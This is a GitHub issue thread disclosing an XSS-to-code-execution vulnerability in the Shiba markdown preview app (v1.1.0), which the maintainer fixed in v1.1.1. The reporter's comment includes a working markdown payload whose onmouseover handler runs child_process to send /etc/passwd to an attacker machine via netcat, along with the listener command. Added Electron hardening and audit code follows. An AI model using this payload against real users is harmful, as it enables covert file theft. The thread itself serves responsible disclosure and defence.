
XSS to RCE vulnerability report #42

Closed
silviavali opened this issue Nov 25, 2017 · 8 comments

Comments

@silviavali

Hello,

I would like to report an XSS vulnerability in your application that leads to code execution.
I have a working POC that I don't want to post publicly.
Please contact me at silviavali14@gmail.com

@rhysd
Owner

rhysd commented Nov 30, 2017

This was fixed in v1.1.1. So I'm closing. Thank you for your report.

@rhysd rhysd closed this as completed Nov 30, 2017
@silviavali
Author

silviavali commented Dec 1, 2017 via email

@attritionorg

@rhysd Can you confirm e8a65b0 is the fixing commit?

@silviavali
Author

silviavali commented Dec 6, 2017 via email

@rhysd
Owner

rhysd commented Dec 6, 2017

@attritionorg Yes.

@silviavali
Author

"XSS to code execution vulnerability due to enabled nodeIntegration"

Date reported: 25th Nov, 2017
Vulnerable version: v1.1.0
Fixed on: Nov 28, 2017, version v1.1.1 (note: some of the HTML elements have been allowed since version v1.2.0)
Fixing commit: e8a65b0

Shiba is a rich live markdown preview app with a linter. It provides functionality to open .md files,
which means those files can be written by the user him/herself or be markdown files shared with the user
by some other third party.

Reproduce the vulnerability:
Attacker runs the following command in a terminal and waits for the connection 'home':
nc -l -p 1337 > passwd.txt

Attacker crafts the following file: payload.md, delivers it to the victim and victim opens it in Shiba:
<s <onmouseover="alert(1)"> <s onmouseover="const exec = require('child_process').exec; exec('nc -w 3 192.168.8.100 1337 < /etc/passwd', (e, stdout, stderr)=> { if (e instanceof Error) { console.error(e); throw e; } console.log('stdout ', stdout); console.log('stderr ', stderr); });alert('1')">Hallo</s>

Possible scenario:
Attacker crafts a markdown file 'payload.md' and makes it publicly available for download, or tricks the victim into downloading it some other way and opening it with the Shiba application. Attacker starts netcat and listens on port 1337 to receive the /etc/passwd file content from the victim's machine. Victim has downloaded and opened the file in the Shiba application. If the victim now hovers over the file content in the markdown editor, the payload gets executed in the background and the attacker receives the '/etc/passwd' file content from the victim's machine.

[screenshot]

You can be sure that the payload got triggered when alert 1 appears on the victim's screen.
[screenshot]

Output from developer tools:
[screenshot]

By now the attacker has received the contents of the /etc/passwd file as the result:
[screenshot]
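The root cause named in the title is the renderer's window configuration, so here, as an added example that is not Shiba's code, are the Electron BrowserWindow settings that let injected markup reach Node beside the settings that close that path, together with a hypothetical `auditWebPreferences` helper that flags the risky ones. The option names are real Electron `webPreferences` keys; the helper and the sample option objects are constructed for this example.

```javascript
// Added example, not Shiba's own code. Shows the webPreferences that turn a
// markdown XSS into code execution, the hardened form, and a small audit
// helper (hypothetical) that reports the risky settings.

// Constructed: a renderer created with these options can call
// require('child_process') from any script that lands in the page, such as an
// onmouseover attribute in inline HTML that the markdown renderer passed through.
const vulnerableWindowOptions = {
  webPreferences: { nodeIntegration: true },
};

// Hardened: the renderer has no Node APIs at all. Anything the UI genuinely
// needs is exposed on purpose from a preload script via contextBridge.
const hardenedWindowOptions = {
  webPreferences: {
    nodeIntegration: false,
    contextIsolation: true,
    sandbox: true,
  },
};

// Returns a list of findings for a BrowserWindow options object. A missing
// value is reported as well, because Electron's defaults for these keys have
// changed between major versions; an explicit setting is the only portable choice.
function auditWebPreferences(options) {
  const prefs = (options && options.webPreferences) || {};
  const findings = [];
  if (prefs.nodeIntegration !== false) {
    findings.push('nodeIntegration: renderer script can require() Node modules');
  }
  if (prefs.contextIsolation !== true) {
    findings.push('contextIsolation: page script shares a JS world with the preload script');
  }
  if (prefs.sandbox !== true) {
    findings.push('sandbox: renderer process is not OS-sandboxed');
  }
  if (prefs.webSecurity === false) {
    findings.push('webSecurity: same-origin policy disabled');
  }
  if (prefs.allowRunningInsecureContent === true) {
    findings.push('allowRunningInsecureContent: mixed content allowed');
  }
  return findings;
}
```

Run the audit against the options object you pass to `new BrowserWindow(...)`; an empty list means none of the listed escalation paths is open, and it says nothing about whether the markdown renderer still passes inline HTML through.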

@rhysd
Owner

rhysd commented May 17, 2018

Thank you for your report. I'll investigate this issue this weekend.

@rhysd rhysd reopened this May 17, 2018
@rhysd
Owner

rhysd commented May 17, 2018

Ah, I'm sorry that I misunderstood your comment. #42 (comment) is a disclosure of this problem and already fixed.
